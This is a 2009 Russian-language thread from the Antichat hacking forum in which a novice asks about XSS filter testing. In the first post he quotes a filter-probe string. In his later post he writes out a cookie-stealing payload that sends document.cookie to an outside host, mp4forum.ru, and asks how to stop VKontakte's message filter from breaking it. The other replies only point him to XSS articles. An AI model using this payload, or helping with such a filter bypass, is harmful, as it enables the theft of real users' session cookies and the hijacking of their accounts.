HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу фильтор
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

фильтор
  #1  
Старый 30.03.2009, 03:36
Plaf-di
Новичок
Регистрация: 23.03.2009
Сообщений: 10
С нами: 9018741

Репутация: -9
По умолчанию фильтор
извеняюсь если гдето это было я не нашёл...

я прочитал:
### А как определить есть фильтр или нет?

Просто в любое поле вводим: '';!--"<fuck>=&{()}
Дальше открываем html страничку и ищем слово "fuck"
и смотри ...........

фильтрации вот так: "><>'"`,/\?@%
и у меня вопрос....
куда писать ';!--"<fuck>=&{()}
да и вобще немоглибы по подробнее расказать про это?

и ещё раз извеняюсь...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.03.2009, 05:34
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию
В тектовые поля.Поподробнеетолько статьи об XSS тебе раскажут.Разжовано все не один раз с 2005 года,просто поищи.
 
Ответить с цитированием

  #3  
Старый 30.03.2009, 05:52
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию
В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...
 
Ответить с цитированием

  #4  
Старый 30.03.2009, 18:45
Plaf-di
Новичок
Регистрация: 23.03.2009
Сообщений: 10
С нами: 9018741

Репутация: -9
По умолчанию
m0Hze
тоесть надо в любое место где можно в вести текст...
а не в адресную строку.

и ещё незнаете как сделать чтобы
...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')...
после того как отпровляешь вконтакте сообщении не стоновилось
...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...
Последний раз редактировалось Plaf-di; 30.03.2009 в 18:49..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.